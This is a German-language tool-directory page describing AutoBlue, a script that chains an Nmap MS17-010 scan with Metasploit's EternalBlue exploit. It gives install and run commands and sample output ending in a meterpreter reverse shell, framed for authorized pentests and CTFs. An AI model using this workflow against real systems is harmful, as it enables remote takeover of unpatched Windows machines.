Skip to content
KitploitKITPLOIT
ToolsExploitsBlog
Log in
Einreichen
ToolsExploitsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
Tools/GitHubGitHub/atithkhawas/autoblue
SchwachstellenscannerPayload-GenerierungExploitationPost-ExploitationCTFPenetrationstestsLernen & BildungRed Teaming
GitHubatithkhawas/autoblue

autoblue

AutoBlue – Automatisiertes EternalBlue-Exploitationstool (CVE-2017-0144 / MS17-010), das Nmap und Metasploit für ethisches Hacking, Penetrationstests und CTF-Herausforderungen nutzt. Ausschließlich für autorisierte und Bildungszwecke bestimmt!

Repository anzeigen
4110vor 1 JahrNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

AUTOBLUE: Automatisiertes EternalBlue-Exploit-Tool

AUTOBLUE ist ein Automatisierungstool, das dazu entwickelt wurde, die EternalBlue-Sicherheitslücke (CVE-2017-0144) auf Windows-Maschinen auszunutzen. Das Tool vereint die Leistungsfähigkeit von Nmap für die Schwachstellensuche und Metasploits msfconsole für die Ausnutzung, sodass Benutzer automatisch anfällige Systeme identifizieren und den EternalBlue-Exploit starten können, um Fernzugriff auf das Ziel zu erhalten.

Dieses Tool wurde in erster Linie für Sicherheitsexperten, Penetrationstester und ethische Hacker entwickelt, die in kontrollierten, autorisierten Umgebungen wie Capture-The-Flag (CTF)-Herausforderungen, Penetrationstest-Einsätzen oder Laborumgebungen arbeiten. AUTOBLUE ermöglicht es Benutzern, die EternalBlue-Sicherheitslücke mit minimalem manuellem Eingriff auszunutzen, indem sie einfach die Ziel-IP-Adresse eingeben.

Funktionen

  • Automatisierte Schwachstellensuche: Verwendet Nmap, um auf der Zielmaschine nach der EternalBlue-Sicherheitslücke (CVE-2017-0144) zu suchen.

  • Nahtlose Ausnutzung: Nutzt Metasploits msfconsole, um den EternalBlue-Exploit automatisch zu starten.

  • Einfache Einrichtung: Erfordert lediglich eine Ziel-IP-Adresse und eine funktionierende Umgebung mit installierten Nmap und Metasploit.

  • Ausgabebericht: Erzeugt eine Ausgabe, die den Erfolg oder Misserfolg des Exploit-Versuchs anzeigt.

Inhaltsverzeichnis

  • Voraussetzungen

  • Installation

  • Verwendung

  • Funktionsweise

  • Sicherheitshinweise

  • Mitwirken

  • Lizenz

  • Danksagungen

  • Haftungsausschluss

Voraussetzungen:

Bevor Sie AUTOBLUE verwenden, stellen Sie sicher, dass die folgenden Tools auf Ihrem System installiert sind:

Nmap: Ein Netzwerkscan-Tool zur Erkennung anfälliger Maschinen.

Metasploit Framework: Eine Penetrationstest-Plattform, die Exploits für EternalBlue enthält.

Nmap installieren:

  • Unter Linux (Debian-basiert):

Code kopieren

      sudo apt update

und

      sudo apt install nmap

Unter Windows oder macOS laden Sie Nmap von der offiziellen Website herunter.

Metasploit installieren:

Unter Linux (Debian-basiert):

Code kopieren

      sudo apt update

und

     sudo apt install metasploit-framework

Unter Windows oder macOS laden Sie Metasploit von der offiziellen Website herunter.

Installation:

Um AUTOBLUE zu installieren, führen Sie die folgenden Schritte aus:

  • Repository klonen:

      git clone https://github.com/AtithKhawas/autoblue.git
    

    und

         cd autoblue
    

Stellen Sie sicher, dass Nmap und Metasploit als Voraussetzungen korrekt installiert sind.

  • Skript ausführbar machen:

    chmod +x autoblue.sh
    

Verwendung:

AUTOBLUE wurde entwickelt, um die Suche und Ausnutzung der EternalBlue-Sicherheitslücke zu automatisieren. So verwenden Sie es:

  • Tool ausführen

Um AUTOBLUE zu verwenden, führen Sie den folgenden Befehl in Ihrem Terminal aus:

Code kopieren

     ./autoblue.sh 

Ausgabe:

     ┌──(root㉿kali)-[/home/Elliot] 
     └─# ./autoblue.sh 
     ============================================
     ********************************************
     AutoBlue    - EternalBlue Exploit Automation
     ********************************************
     ********************************************
     ------------------------Made by ATITH KHAWAS
     ============================================
     Enter Target IP Address:

Es wird nach der Ziel-IP-Adresse und Ihrer gefragt.

Beispiel

      Enter Target IP Address: Ziel<IP-Adresse>
      Enter Your IP Address: Ihre <IP-Adresse>

Sobald Sie das Tool ausführen, beginnt es mit dem Scan mit Nmap:

Ausgabe-1

 Target IP Address: ***.***.**.**
 [+] Scanning Target for MS17-010 Vulnerability...
 Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-30 12:41 EST
 Nmap scan report for ***.***.**.**
 Host is up (0.19s latency).

 PORT    STATE SERVICE
 445/tcp open  microsoft-ds

 Host script results:
 | smb-vuln-ms17-010: 
 |   VULNERABLE:
 |   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
 |     State: VULNERABLE
 |     IDs:  CVE:CVE-2017-0143
 |     Risk factor: HIGH
 |       A critical remote code execution vulnerability exists in Microsoft SMBv1
 |        servers (ms17-010).
 |           
 |     Disclosure date: 2017-03-14
 |     References:
 |       https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
 |       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
 |_      https://technet.microsoft.com/en-us/library/security/ms17-010.aspx

 Nmap done: 1 IP address (1 host up) scanned in 2.40 seconds
 [+] Target is VULNERABLE to EternalBlue!

Hier beginnt die eigentliche Arbeit, die den zeitaufwändigen Prozess erheblich verkürzt. Wenn das Ziel anfällig ist, startet es automatisch die Msfconsole und setzt RHOSTS, PAYLOAD, LHOST und LPORT mit dem Standardport 4444.

Ausgabe-2

      [+] Launching Metasploit...
      [*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp
      RHOSTS => ***.***.**.**
      PAYLOAD => windows/x64/meterpreter/reverse_tcp
      LHOST => ***.***.**.**
      LPORT => 4444
      [*] Started reverse TCP handler on ***.***.**.**:4444 

Und liefert uns die Meterpreter-Shell des Ziels.

Ausgabe-3

       [+] ***.***.**.**:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
       [+] ***.***.**.**:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
       [+] ***.***.**.**:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

       meterpreter > pwd
       C:\Windows\system32

Funktionsweise:

  • Nmap-Skript-Scan: Das Tool verwendet zunächst einen Nmap-Skript-Scan (--script smb-vuln-ms17-010), um zu erkennen, ob die Zielmaschine anfällig für den EternalBlue-Exploit ist. Es überprüft, ob Port 445 geöffnet ist, und versucht, SMB-Schwachstellen zu identifizieren.

  • Metasploit-Exploit: Wenn die Zielmaschine als anfällig erkannt wird, startet AUTOBLUE den EternalBlue-Exploit mithilfe von Metasploits msfconsole. Das Skript konfiguriert und sendet die erforderliche Payload, um die Schwachstelle auszunutzen.

  • Reverse Shell: Bei erfolgreichem Exploit wird eine Reverse-Shell geöffnet, die eine Befehlszeilenschnittstelle auf dem Opferrechner bereitstellt.

  • Rückmeldung: Das Tool gibt während des gesamten Prozesses Rückmeldungen, einschließlich der Information, ob das Ziel erfolgreich ausgenutzt wurde, und gibt relevante Informationen aus (z. B. IP-Adresse der Reverse-Shell).

Sicherheitshinweise:

  • Rechtmäßige Nutzung: Dieses Tool sollte nur in autorisierten Umgebungen verwendet werden. Stellen Sie sicher, dass Sie die ausdrückliche Erlaubnis haben, die Zielmaschine zu testen, und dass dies in Ihrer Gerichtsbarkeit nicht illegal ist.

  • Benutzereingabe: Stellen Sie sicher, dass nur vertrauenswürdige IPs in das Tool eingegeben werden, um Missbrauch zu verhindern. Das Ausführen dieses Tools auf nicht vertrauenswürdigen Systemen kann zu Sicherheitsvorfällen führen.

  • Payload-Sicherheit: Die in diesem Tool verwendete Reverse-Shell-Payload ist von Natur aus riskant. Setzen Sie die Angriffsmaschine oder ihre Listener keinen nicht vertrauenswürdigen Netzwerken aus.

  • Abhängigkeiten aktualisieren: Aktualisieren Sie Nmap und Metasploit regelmäßig, um bekannte Sicherheitslücken in diesen Tools zu beheben.

Mitwirken:

Beiträge zum AUTOBLUE-Projekt sind willkommen. Wenn Sie Vorschläge, Verbesserungen oder Fehlerbehebungen haben, können Sie das Repository forken und einen Pull-Request erstellen.

Tool herunterladen